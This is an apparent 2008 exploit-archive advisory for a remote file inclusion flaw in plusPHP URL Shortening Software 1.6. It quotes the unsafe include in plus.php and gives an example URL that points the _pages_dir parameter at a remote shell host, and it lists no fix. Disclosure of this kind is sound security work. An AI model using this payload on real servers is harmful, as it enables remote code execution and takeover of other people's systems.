plusPHP URL Shortening Software 1.6 Remote File Inclusion Vulnerability

2008-05-25 00:00:00

Author: DR.TOXIC / [email protected]

Title: plusPHP Multi-User Short URL and Statistics (plus.php) RFI Vulnerability
Script Download: http://www.hotscripts.com/jump.php?listing_id=80293&jump_type=1
Vulnerability Code: (plus.php) "include ($_pages_dir.'_config.php');"
Example;
http://localhost/plus.php?_pages_dir=http://SH3LL?
<--------------------Milw0rm Exploits-------------------->

#

Fixes

No fixes

In order to submit a new fix you need to be registered.